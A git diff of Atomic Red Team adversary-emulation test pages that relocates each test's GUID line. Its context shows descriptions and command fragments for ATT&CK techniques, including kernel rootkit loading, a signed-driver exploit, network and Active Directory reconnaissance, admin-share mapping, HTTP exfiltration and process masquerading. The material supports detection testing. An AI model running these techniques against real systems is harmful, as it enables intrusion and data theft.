## Atomic Test #2 - System Service Discovery - net.exe - -auto_generated_guid: 5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3 - Enumerates started system services using net.exe and writes them to a file. This technique has been used by multiple threat actors. Upon successful execution, net.exe will run from cmd.exe that queries services. Expected output is to a txt file in c:\Windows\Temp\service-list.txt.s + **Supported Platforms:** Windows +**auto_generated_guid:** 5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3 + + + #### Inputs: diff --git a/atomics/T1010/T1010.md b/atomics/T1010/T1010.md index e706e035..8655b46f 100644 --- a/atomics/T1010/T1010.md +++ b/atomics/T1010/T1010.md @@ -10,15 +10,17 @@
## Atomic Test #1 - List Process Main Windows - C# .NET - -auto_generated_guid: fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4 - Compiles and executes C# code to list main window titles associated with each process. Upon successful execution, powershell will download the .cs from the Atomic Red Team repo, and cmd.exe will compile and execute T1010.exe. Upon T1010.exe execution, expected output will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4 + + + #### Inputs: diff --git a/atomics/T1012/T1012.md b/atomics/T1012/T1012.md index 650fef02..272ee9ac 100644 --- a/atomics/T1012/T1012.md +++ b/atomics/T1012/T1012.md @@ -12,9 +12,6 @@ The Registry contains a significant amount of information about the operating sy
## Atomic Test #1 - Query Registry - -auto_generated_guid: 8f7578c4-9863-4d83-875c-a565573bbdf0 - Query Windows Registry. Upon successful execution, cmd.exe will perform multiple reg queries. Some will succeed and others will fail (dependent upon OS). References: @@ -22,9 +19,14 @@ https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-se https://blog.cylance.com/windows-registry-persistence-part-1-introduction-attack-phases-and-windows-services http://www.handgrep.se/repository/cheatsheets/postexploitation/WindowsPost-Exploitation.pdf https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_Find_Chart.en_us.pdf + **Supported Platforms:** Windows +**auto_generated_guid:** 8f7578c4-9863-4d83-875c-a565573bbdf0 + + + diff --git a/atomics/T1014/T1014.md b/atomics/T1014/T1014.md index 62b1a33f..43f2a795 100644 --- a/atomics/T1014/T1014.md +++ b/atomics/T1014/T1014.md @@ -16,13 +16,15 @@ Rootkits or rootkit enabling functionality may reside at the user or kernel leve
## Atomic Test #1 - Loadable Kernel Module based Rootkit - -auto_generated_guid: dfb50072-e45a-4c75-a17e-a484809c8553 - Loadable Kernel Module based Rootkit + **Supported Platforms:** Linux +**auto_generated_guid:** dfb50072-e45a-4c75-a17e-a484809c8553 + + + #### Inputs: @@ -70,13 +72,15 @@ mv #{temp_folder}/#{rootkit_name}.ko #{rootkit_path}
## Atomic Test #2 - Loadable Kernel Module based Rootkit - -auto_generated_guid: 75483ef8-f10f-444a-bf02-62eb0e48db6f - Loadable Kernel Module based Rootkit + **Supported Platforms:** Linux +**auto_generated_guid:** 75483ef8-f10f-444a-bf02-62eb0e48db6f + + + #### Inputs: @@ -127,9 +131,6 @@ sudo depmod -a
## Atomic Test #3 - Windows Signed Driver Rootkit Test - -auto_generated_guid: 8e4e1985-9a19-4529-b4b8-b7a49ff87fae - This test exploits a signed driver to execute code in Kernel. This example was curated from a blog that utilizes puppetstrings.exe with the vulnerable (signed driver) capcom.sys. The capcom.sys driver may be found on github. A great reference is here: http://www.fuzzysecurity.com/tutorials/28.html @@ -139,9 +140,14 @@ https://zerosum0x0.blogspot.com/2017/07/puppet-strings-dirty-secret-for-free.htm The hash of our PoC Exploit is SHA1 DD8DA630C00953B6D5182AA66AF999B1E117F441 This will simulate hiding a process. + **Supported Platforms:** Windows +**auto_generated_guid:** 8e4e1985-9a19-4529-b4b8-b7a49ff87fae + + + #### Inputs: diff --git a/atomics/T1016/T1016.md b/atomics/T1016/T1016.md index fcc7fb8d..35bd3edd 100644 --- a/atomics/T1016/T1016.md +++ b/atomics/T1016/T1016.md @@ -26,15 +26,17 @@ Adversaries may use the information from [System Network Configuration Discovery
## Atomic Test #1 - System Network Configuration Discovery on Windows - -auto_generated_guid: 970ab6a1-0157-4f3f-9a73-ec4166754b23 - Identify network configuration information Upon successful execution, cmd.exe will spawn multiple commands to list network configuration settings. Output will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** 970ab6a1-0157-4f3f-9a73-ec4166754b23 + + + @@ -58,15 +60,17 @@ net config
## Atomic Test #2 - List Windows Firewall Rules - -auto_generated_guid: 038263cb-00f4-4b0a-98ae-0696c67e1752 - Enumerates Windows Firewall Rules using netsh. Upon successful execution, cmd.exe will spawn netsh.exe to list firewall rules. Output will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** 038263cb-00f4-4b0a-98ae-0696c67e1752 + + + @@ -86,15 +90,17 @@ netsh advfirewall firewall show rule name=all
## Atomic Test #3 - System Network Configuration Discovery - -auto_generated_guid: c141bbdb-7fca-4254-9fd6-f47e79447e17 - Identify network configuration information. Upon successful execution, sh will spawn multiple commands and output will be via stdout. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** c141bbdb-7fca-4254-9fd6-f47e79447e17 + + + @@ -117,15 +123,17 @@ if [ -x "$(command -v netstat)" ]; then netstat -ant | awk '{print $NF}' | grep
## Atomic Test #4 - System Network Configuration Discovery (TrickBot Style) - -auto_generated_guid: dafaf052-5508-402d-bf77-51e0700c02e2 - Identify network configuration information as seen by Trickbot and described here https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/ Upon successful execution, cmd.exe will spawn `ipconfig /all`, `net config workstation`, `net view /all /domain`, `nltest /domain_trusts`. Output will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** dafaf052-5508-402d-bf77-51e0700c02e2 + + + @@ -148,16 +156,18 @@ nltest /domain_trusts
## Atomic Test #5 - List Open Egress Ports - -auto_generated_guid: 4b467538-f102-491d-ace7-ed487b853bf5 - This is to test for what ports are open outbound. The technique used was taken from the following blog: https://www.blackhillsinfosec.com/poking-holes-in-the-firewall-egress-testing-with-allports-exposed/ Upon successful execution, powershell will read top-128.txt (ports) and contact each port to confirm if open or not. Output will be to Desktop\open-ports.txt. + **Supported Platforms:** Windows +**auto_generated_guid:** 4b467538-f102-491d-ace7-ed487b853bf5 + + + #### Inputs: @@ -226,14 +236,16 @@ Invoke-WebRequest "#{portfile_url}" -OutFile "#{port_file}"
## Atomic Test #6 - Adfind - Enumerate Active Directory Subnet Objects - -auto_generated_guid: 9bb45dd7-c466-4f93-83a1-be30e56033ee - Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Subnet Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html + **Supported Platforms:** Windows +**auto_generated_guid:** 9bb45dd7-c466-4f93-83a1-be30e56033ee + + + #### Inputs: @@ -270,13 +282,15 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
## Atomic Test #7 - Qakbot Recon - -auto_generated_guid: 121de5c6-5818-4868-b8a7-8fd07c455c1b - A list of commands known to be performed by Qakbot for recon purposes + **Supported Platforms:** Windows +**auto_generated_guid:** 121de5c6-5818-4868-b8a7-8fd07c455c1b + + + #### Inputs: @@ -301,17 +315,19 @@ A list of commands known to be performed by Qakbot for recon purposes
## Atomic Test #8 - List macOS Firewall Rules - -auto_generated_guid: ff1d8c25-2aa4-4f18-a425-fede4a41ee88 - "This will test if the macOS firewall is enabled and/or show what rules are configured. Must be run with elevated privileges. Upon successful execution, these commands will output various information about the firewall configuration, including status and specific port/protocol blocks or allows. Using `defaults`, additional arguments can be added to see filtered details, such as `globalstate` for global configuration (\"Is it on or off?\"), `firewall` for common application allow rules, and `explicitauths` for specific rules configured by the user. Using `socketfilterfw`, flags such as --getglobalstate or --listapps can be used for similar filtering. At least one flag is required to send parseable output to standard out. + **Supported Platforms:** macOS +**auto_generated_guid:** ff1d8c25-2aa4-4f18-a425-fede4a41ee88 + + + diff --git a/atomics/T1018/T1018.md b/atomics/T1018/T1018.md index 2f288279..5d28a39a 100644 --- a/atomics/T1018/T1018.md +++ b/atomics/T1018/T1018.md @@ -32,15 +32,17 @@ Specific to macOS, the bonjour protocol exists to discover addition
## Atomic Test #1 - Remote System Discovery - net - -auto_generated_guid: 85321a9c-897f-4a60-9f20-29788e50bccd - Identify remote systems with net.exe. Upon successful execution, cmd.exe will execute `net.exe view` and display results of local systems on the network that have file and print sharing enabled. + **Supported Platforms:** Windows +**auto_generated_guid:** 85321a9c-897f-4a60-9f20-29788e50bccd + + + @@ -61,15 +63,17 @@ net view
## Atomic Test #2 - Remote System Discovery - net group Domain Computers - -auto_generated_guid: f1bf6c8f-9016-4edf-aff9-80b65f5d711f - Identify remote systems with net.exe querying the Active Directory Domain Computers group. Upon successful execution, cmd.exe will execute cmd.exe against Active Directory to list the "Domain Computers" group. Output will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** f1bf6c8f-9016-4edf-aff9-80b65f5d711f + + + @@ -89,15 +93,17 @@ net group "Domain Computers" /domain
## Atomic Test #3 - Remote System Discovery - nltest - -auto_generated_guid: 52ab5108-3f6f-42fb-8ba3-73bc054f22c8 - Identify domain controllers for specified domain. Upon successful execution, cmd.exe will execute nltest.exe against a target domain to retrieve a list of domain controllers. Output will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** 52ab5108-3f6f-42fb-8ba3-73bc054f22c8 + + + #### Inputs: @@ -122,15 +128,17 @@ nltest.exe /dclist:#{target_domain}
## Atomic Test #4 - Remote System Discovery - ping sweep - -auto_generated_guid: 6db1f57f-d1d5-4223-8a66-55c9c65a9592 - Identify remote systems via ping sweep. Upon successful execution, cmd.exe will perform a for loop against the 192.168.1.1/24 network. Output will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** 6db1f57f-d1d5-4223-8a66-55c9c65a9592 + + + @@ -150,15 +158,17 @@ for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i
## Atomic Test #5 - Remote System Discovery - arp - -auto_generated_guid: 2d5a61f5-0447-4be4-944a-1f8530ed6574 - Identify remote systems via arp. Upon successful execution, cmd.exe will execute arp to list out the arp cache. Output will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** 2d5a61f5-0447-4be4-944a-1f8530ed6574 + + + @@ -178,15 +188,17 @@ arp -a
## Atomic Test #6 - Remote System Discovery - arp nix - -auto_generated_guid: acb6b1ff-e2ad-4d64-806c-6c35fe73b951 - Identify remote systems via arp. Upon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** acb6b1ff-e2ad-4d64-806c-6c35fe73b951 + + + @@ -218,15 +230,17 @@ echo "Install arp on the machine."; exit 1;
## Atomic Test #7 - Remote System Discovery - sweep - -auto_generated_guid: 96db2632-8417-4dbb-b8bb-a8b92ba391de - Identify remote systems via ping sweep. Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 96db2632-8417-4dbb-b8bb-a8b92ba391de + + + #### Inputs: @@ -253,15 +267,17 @@ for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip; [ $? -e
## Atomic Test #8 - Remote System Discovery - nslookup - -auto_generated_guid: baa01aaa-5e13-45ec-8a0d-e46c93c9760f - Powershell script that runs nslookup on cmd.exe against the local /24 network of the first network adaptor listed in ipconfig. Upon successful execution, powershell will identify the ip range (via ipconfig) and perform a for loop and execute nslookup against that IP range. Output will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** baa01aaa-5e13-45ec-8a0d-e46c93c9760f + + + @@ -286,15 +302,17 @@ foreach ($ip in 1..255 | % { "$firstOctet.$secondOctet.$thirdOctet.$_" } ) {cmd.
## Atomic Test #9 - Remote System Discovery - adidnsdump - -auto_generated_guid: 95e19466-469e-4316-86d2-1dc401b5a959 - This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and adidnsdump must be installed, use the get_prereq_command's to meet the prerequisites for this test. Successful execution of this test will list dns zones in the terminal. + **Supported Platforms:** Windows +**auto_generated_guid:** 95e19466-469e-4316-86d2-1dc401b5a959 + + + #### Inputs: @@ -351,14 +369,16 @@ pip3 install adidnsdump
## Atomic Test #10 - Adfind - Enumerate Active Directory Computer Objects - -auto_generated_guid: a889f5be-2d54-4050-bd05-884578748bb4 - Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Computer Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html + **Supported Platforms:** Windows +**auto_generated_guid:** a889f5be-2d54-4050-bd05-884578748bb4 + + + #### Inputs: @@ -395,14 +415,16 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
## Atomic Test #11 - Adfind - Enumerate Active Directory Domain Controller Objects - -auto_generated_guid: 5838c31e-a0e2-4b9f-b60a-d79d2cb7995e - Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Domain Controller Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html + **Supported Platforms:** Windows +**auto_generated_guid:** 5838c31e-a0e2-4b9f-b60a-d79d2cb7995e + + + #### Inputs: diff --git a/atomics/T1020/T1020.md b/atomics/T1020/T1020.md index f7ba85be..3c62c9dd 100644 --- a/atomics/T1020/T1020.md +++ b/atomics/T1020/T1020.md @@ -12,15 +12,17 @@ When automated exfiltration is used, other exfiltration techniques likely apply
## Atomic Test #1 - IcedID Botnet HTTP PUT - -auto_generated_guid: 9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0 - Creates a text file Tries to upload to a server via HTTP PUT method with ContentType Header Deletes a created file + **Supported Platforms:** Windows +**auto_generated_guid:** 9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0 + + + #### Inputs: diff --git a/atomics/T1021.001/T1021.001.md b/atomics/T1021.001/T1021.001.md index 93c50921..1d647cd1 100644 --- a/atomics/T1021.001/T1021.001.md +++ b/atomics/T1021.001/T1021.001.md @@ -16,13 +16,15 @@ Adversaries may connect to a remote system over RDP/RDS to expand access if the
## Atomic Test #1 - RDP to DomainController - -auto_generated_guid: 355d4632-8cb9-449d-91ce-b566d0253d3e - Attempt an RDP session via Remote Desktop Application to a DomainController. + **Supported Platforms:** Windows +**auto_generated_guid:** 355d4632-8cb9-449d-91ce-b566d0253d3e + + + #### Inputs: @@ -72,13 +74,15 @@ Write-Host Joining this computer to a domain must be done manually
## Atomic Test #2 - RDP to Server - -auto_generated_guid: 7382a43e-f19c-46be-8f09-5c63af7d3e2b - Attempt an RDP session via Remote Desktop Application over Powershell + **Supported Platforms:** Windows +**auto_generated_guid:** 7382a43e-f19c-46be-8f09-5c63af7d3e2b + + + #### Inputs: diff --git a/atomics/T1021.002/T1021.002.md b/atomics/T1021.002/T1021.002.md index f772ec3d..6cfb82c9 100644 --- a/atomics/T1021.002/T1021.002.md +++ b/atomics/T1021.002/T1021.002.md @@ -20,13 +20,15 @@ Windows systems have hidden network shares that are accessible only to administr
## Atomic Test #1 - Map admin share - -auto_generated_guid: 3386975b-367a-4fbb-9d77-4dcf3639ffd3 - Connecting To Remote Shares + **Supported Platforms:** Windows +**auto_generated_guid:** 3386975b-367a-4fbb-9d77-4dcf3639ffd3 + + + #### Inputs: @@ -54,13 +56,15 @@ cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}
## Atomic Test #2 - Map Admin Share PowerShell - -auto_generated_guid: 514e9cd7-9207-4882-98b1-c8f791bae3c5 - Map Admin share utilizing PowerShell + **Supported Platforms:** Windows +**auto_generated_guid:** 514e9cd7-9207-4882-98b1-c8f791bae3c5 + + + #### Inputs: @@ -87,13 +91,15 @@ New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{
## Atomic Test #3 - Copy and Execute File with PsExec - -auto_generated_guid: 0eb03d41-79e4-4393-8e57-6344856be1cf - Copies a file to a remote host and executes it using PsExec. Requires the download of PsExec from [https://docs.microsoft.com/en-us/sysinternals/downloads/psexec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec). + **Supported Platforms:** Windows +**auto_generated_guid:** 0eb03d41-79e4-4393-8e57-6344856be1cf + + + #### Inputs: @@ -135,14 +141,16 @@ Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_exe}" -Force
## Atomic Test #4 - Execute command writing output to local Admin Share - -auto_generated_guid: d41aaab5-bdfe-431d-a3d5-c29e9136ff46 - Executes a command, writing the output to a local Admin Share. This technique is used by post-exploitation frameworks. + **Supported Platforms:** Windows +**auto_generated_guid:** d41aaab5-bdfe-431d-a3d5-c29e9136ff46 + + + #### Inputs: diff --git a/atomics/T1021.003/T1021.003.md b/atomics/T1021.003/T1021.003.md index d197e64c..a51150c8 100644 --- a/atomics/T1021.003/T1021.003.md +++ b/atomics/T1021.003/T1021.003.md @@ -16,9 +16,6 @@ Through DCOM, adversaries operating in the context of an appropriately privilege
## Atomic Test #1 - PowerShell Lateral Movement using MMC20 - -auto_generated_guid: 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673 - Powershell lateral movement using the mmc20 application com object. Reference: @@ -26,9 +23,14 @@ Reference: https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/ Upon successful execution, cmd will spawn calc.exe on a remote computer. + **Supported Platforms:** Windows +**auto_generated_guid:** 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673 + + + #### Inputs: diff --git a/atomics/T1021.006/T1021.006.md b/atomics/T1021.006/T1021.006.md index a5fb4f0d..4a0d0636 100644 --- a/atomics/T1021.006/T1021.006.md +++ b/atomics/T1021.006/T1021.006.md @@ -16,15 +16,17 @@ WinRM is the name of both a Windows service and a protocol that allows a user to
## Atomic Test #1 - Enable Windows Remote Management - -auto_generated_guid: 9059e8de-3d7d-4954-a322-46161880b9cf - Powershell Enable WinRM Upon successful execution, powershell will "Enable-PSRemoting" allowing for remote PS access. + **Supported Platforms:** Windows +**auto_generated_guid:** 9059e8de-3d7d-4954-a322-46161880b9cf + + + @@ -44,15 +46,17 @@ Enable-PSRemoting -Force
## Atomic Test #2 - Invoke-Command - -auto_generated_guid: 5295bd61-bd7e-4744-9d52-85962a4cf2d6 - Execute Invoke-command on remote host. Upon successful execution, powershell will execute ipconfig on localhost using `invoke-command`. + **Supported Platforms:** Windows +**auto_generated_guid:** 5295bd61-bd7e-4744-9d52-85962a4cf2d6 + + + #### Inputs: @@ -78,13 +82,15 @@ invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}}
## Atomic Test #3 - WinRM Access with Evil-WinRM - -auto_generated_guid: efe86d95-44c4-4509-ae42-7bfd9d1f5b3d - An adversary may attempt to use Evil-WinRM with a valid account to interact with remote systems that have WinRM enabled + **Supported Platforms:** Windows +**auto_generated_guid:** efe86d95-44c4-4509-ae42-7bfd9d1f5b3d + + + #### Inputs: diff --git a/atomics/T1027.001/T1027.001.md b/atomics/T1027.001/T1027.001.md index d7874fa0..efb354ce 100644 --- a/atomics/T1027.001/T1027.001.md +++ b/atomics/T1027.001/T1027.001.md @@ -12,15 +12,17 @@ Binary padding effectively changes the checksum of the file and can also be used
## Atomic Test #1 - Pad Binary to Change Hash - Linux/macOS dd - -auto_generated_guid: ffe2346c-abd5-4b45-a713-bf5f1ebd573a - Uses dd to add a zero to the binary to change the hash. Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** ffe2346c-abd5-4b45-a713-bf5f1ebd573a + + + #### Inputs: diff --git a/atomics/T1027.002/T1027.002.md b/atomics/T1027.002/T1027.002.md index 0bc19e12..8f8c16f1 100644 --- a/atomics/T1027.002/T1027.002.md +++ b/atomics/T1027.002/T1027.002.md @@ -18,14 +18,16 @@ Utilities used to perform software packing are called packers. Example packers a
## Atomic Test #1 - Binary simply packed by UPX (linux) - -auto_generated_guid: 11c46cd8-e471-450e-acb8-52a1216ae6a4 - Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX. No other protection/compression were applied. + **Supported Platforms:** Linux +**auto_generated_guid:** 11c46cd8-e471-450e-acb8-52a1216ae6a4 + + + #### Inputs: @@ -54,16 +56,18 @@ rm /tmp/packed_bin
## Atomic Test #2 - Binary packed by UPX, with modified headers (linux) - -auto_generated_guid: f06197f8-ff46-48c2-a0c6-afc1b50665e1 - Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX. The UPX magic number (`0x55505821`, "`UPX!`") was changed to (`0x4c4f5452`, "`LOTR`"). This prevents the binary from being detected by some methods, and especially UPX is not able to uncompress it any more. + **Supported Platforms:** Linux +**auto_generated_guid:** f06197f8-ff46-48c2-a0c6-afc1b50665e1 + + + #### Inputs: @@ -92,14 +96,16 @@ rm /tmp/packed_bin
## Atomic Test #3 - Binary simply packed by UPX - -auto_generated_guid: b16ef901-00bb-4dda-b4fc-a04db5067e20 - Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX. No other protection/compression were applied. + **Supported Platforms:** macOS +**auto_generated_guid:** b16ef901-00bb-4dda-b4fc-a04db5067e20 + + + #### Inputs: @@ -128,16 +134,18 @@ rm /tmp/packed_bin
## Atomic Test #4 - Binary packed by UPX, with modified headers - -auto_generated_guid: 4d46e16b-5765-4046-9f25-a600d3e65e4d - Copies and then runs a simple binary (just outputting "the cake is a lie"), that was packed by UPX. The UPX magic number (`0x55505821`, "`UPX!`") was changed to (`0x4c4f5452`, "`LOTR`"). This prevents the binary from being detected by some methods, and especially UPX is not able to uncompress it any more. + **Supported Platforms:** macOS +**auto_generated_guid:** 4d46e16b-5765-4046-9f25-a600d3e65e4d + + + #### Inputs: diff --git a/atomics/T1027.004/T1027.004.md b/atomics/T1027.004/T1027.004.md index 4b1a7bcc..004bcf72 100644 --- a/atomics/T1027.004/T1027.004.md +++ b/atomics/T1027.004/T1027.004.md @@ -14,14 +14,16 @@ Source code payloads may also be encrypted, encoded, and/or embedded within othe
## Atomic Test #1 - Compile After Delivery using csc.exe - -auto_generated_guid: ffcdbd6a-b0e8-487d-927a-09127fe9a206 - Compile C# code using csc.exe binary used by .NET Upon execution an exe named T1027.004.exe will be placed in the temp folder + **Supported Platforms:** Windows +**auto_generated_guid:** ffcdbd6a-b0e8-487d-927a-09127fe9a206 + + + #### Inputs: @@ -64,16 +66,18 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - Dynamic C# Compile - -auto_generated_guid: 453614d8-3ba6-4147-acc0-7ec4b3e1faef - When C# is compiled dynamically, a .cmdline file will be created as a part of the process. Certain processes are not typically observed compiling C# code, but can do so without touching disk. This can be used to unpack a payload for execution. The exe file that will be executed is named as T1027.004_DynamicCompile.exe is containted in the 'bin' folder of this atomic, and the source code to the file is in the 'src' folder. Upon execution, the exe will print 'T1027.004 Dynamic Compile'. + **Supported Platforms:** Windows +**auto_generated_guid:** 453614d8-3ba6-4147-acc0-7ec4b3e1faef + + + #### Inputs: diff --git a/atomics/T1027/T1027.md b/atomics/T1027/T1027.md index 152fface..e40093ff 100644 --- a/atomics/T1027/T1027.md +++ b/atomics/T1027/T1027.md @@ -26,15 +26,17 @@ Adversaries may also obfuscate commands executed from payloads or directly via a
## Atomic Test #1 - Decode base64 Data into Script - -auto_generated_guid: f45df6be-2e1e-4136-a384-8f18ab3826fb - Creates a base64-encoded data file and decodes it into an executable shell script Upon successful execution, sh will execute art.sh, which is a base64 encoded command, that stdouts `echo Hello from the Atomic Red Team`. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** f45df6be-2e1e-4136-a384-8f18ab3826fb + + + @@ -57,15 +59,17 @@ chmod +x /tmp/art.sh
## Atomic Test #2 - Execute base64-encoded PowerShell - -auto_generated_guid: a50d5a97-2531-499e-a1de-5544c74432c6 - Creates base64-encoded PowerShell code and executes it. This is used by numerous adversaries and malicious tools. Upon successful execution, powershell will execute an encoded command and stdout default is "Write-Host "Hey, Atomic!" + **Supported Platforms:** Windows +**auto_generated_guid:** a50d5a97-2531-499e-a1de-5544c74432c6 + + + #### Inputs: @@ -94,15 +98,17 @@ powershell.exe -EncodedCommand $EncodedCommand
## Atomic Test #3 - Execute base64-encoded PowerShell from Windows Registry - -auto_generated_guid: 450e7218-7915-4be4-8b9b-464a49eafcec - Stores base64-encoded PowerShell code in the Windows Registry and deobfuscates it for execution. This is used by numerous adversaries and malicious tools. Upon successful execution, powershell will execute encoded command and read/write from the registry. + **Supported Platforms:** Windows +**auto_generated_guid:** 450e7218-7915-4be4-8b9b-464a49eafcec + + + #### Inputs: @@ -139,13 +145,15 @@ Remove-ItemProperty -Force -ErrorAction Ignore -Path #{registry_key_storage} -Na
## Atomic Test #4 - Execution from Compressed File - -auto_generated_guid: f8c8a909-5f29-49ac-9244-413936ce6d1f - Mimic execution of compressed executable. When successfully executed, calculator.exe will open. + **Supported Platforms:** Windows +**auto_generated_guid:** f8c8a909-5f29-49ac-9244-413936ce6d1f + + + #### Inputs: @@ -190,14 +198,16 @@ Expand-Archive -path "$env:temp\T1027.zip" -DestinationPath "$env:temp\temp_T102
## Atomic Test #5 - DLP Evasion via Sensitive Data in VBA Macro over email - -auto_generated_guid: 129edb75-d7b8-42cd-a8ba-1f3db64ec4ad - Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using email. Sensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check. + **Supported Platforms:** Windows +**auto_generated_guid:** 129edb75-d7b8-42cd-a8ba-1f3db64ec4ad + + + #### Inputs: @@ -225,14 +235,16 @@ Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -A
## Atomic Test #6 - DLP Evasion via Sensitive Data in VBA Macro over HTTP - -auto_generated_guid: e2d85e66-cb66-4ed7-93b1-833fc56c9319 - Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using HTTP. Sensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check. + **Supported Platforms:** Windows +**auto_generated_guid:** e2d85e66-cb66-4ed7-93b1-833fc56c9319 + + + #### Inputs: diff --git a/atomics/T1030/T1030.md b/atomics/T1030/T1030.md index 1e1ace1e..77b26949 100644 --- a/atomics/T1030/T1030.md +++ b/atomics/T1030/T1030.md @@ -10,13 +10,15 @@
## Atomic Test #1 - Data Transfer Size Limits - -auto_generated_guid: ab936c51-10f4-46ce-9144-e02137b2016a - Take a file/directory, split it into 5Mb chunks + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** ab936c51-10f4-46ce-9144-e02137b2016a + + + #### Inputs: diff --git a/atomics/T1033/T1033.md b/atomics/T1033/T1033.md index a6b8c381..a491d1e9 100644 --- a/atomics/T1033/T1033.md +++ b/atomics/T1033/T1033.md @@ -16,16 +16,18 @@ Utilities and commands that acquire this information include whoami
## Atomic Test #1 - System Owner/User Discovery - -auto_generated_guid: 4c4959bf-addf-4b4a-be86-8d09cc1857aa - Identify System owner or users on an endpoint. Upon successful execution, cmd.exe will spawn multiple commands against a target host to identify usernames. Output will be via stdout. Additionally, two files will be written to disk - computers.txt and usernames.txt. + **Supported Platforms:** Windows +**auto_generated_guid:** 4c4959bf-addf-4b4a-be86-8d09cc1857aa + + + #### Inputs: @@ -57,15 +59,17 @@ for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active
## Atomic Test #2 - System Owner/User Discovery - -auto_generated_guid: 2a9b677d-a230-44f4-ad86-782df1ef108c - Identify System owner or users on an endpoint Upon successful execution, sh will stdout list of usernames. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 2a9b677d-a230-44f4-ad86-782df1ef108c + + + @@ -87,13 +91,15 @@ who
## Atomic Test #3 - Find computers where user has session - Stealth mode (PowerView) - -auto_generated_guid: 29857f27-a36f-4f7e-8084-4557cd6207ca - Find existing user session on other computers. Upon execution, information about any sessions discovered will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 29857f27-a36f-4f7e-8084-4557cd6207ca + + + diff --git a/atomics/T1036.003/T1036.003.md b/atomics/T1036.003/T1036.003.md index 9087162b..c2f528f3 100644 --- a/atomics/T1036.003/T1036.003.md +++ b/atomics/T1036.003/T1036.003.md @@ -26,15 +26,17 @@
## Atomic Test #1 - Masquerading as Windows LSASS process - -auto_generated_guid: 5ba5a3d1-cf3c-4499-968a-a93155d1f717 - Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsass.exe. Upon execution, cmd will be launched by powershell. If using Invoke-AtomicTest, The test will hang until the 120 second timeout cancels the session + **Supported Platforms:** Windows +**auto_generated_guid:** 5ba5a3d1-cf3c-4499-968a-a93155d1f717 + + + @@ -59,15 +61,17 @@ del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1
## Atomic Test #2 - Masquerading as Linux crond process. - -auto_generated_guid: a315bfff-7a98-403b-b442-2ea1b255e556 - Copies sh process, renames it as crond, and executes it to masquerade as the cron daemon. Upon successful execution, sh is renamed to `crond` and executed. + **Supported Platforms:** Linux +**auto_generated_guid:** a315bfff-7a98-403b-b442-2ea1b255e556 + + + @@ -92,15 +96,17 @@ rm /tmp/crond
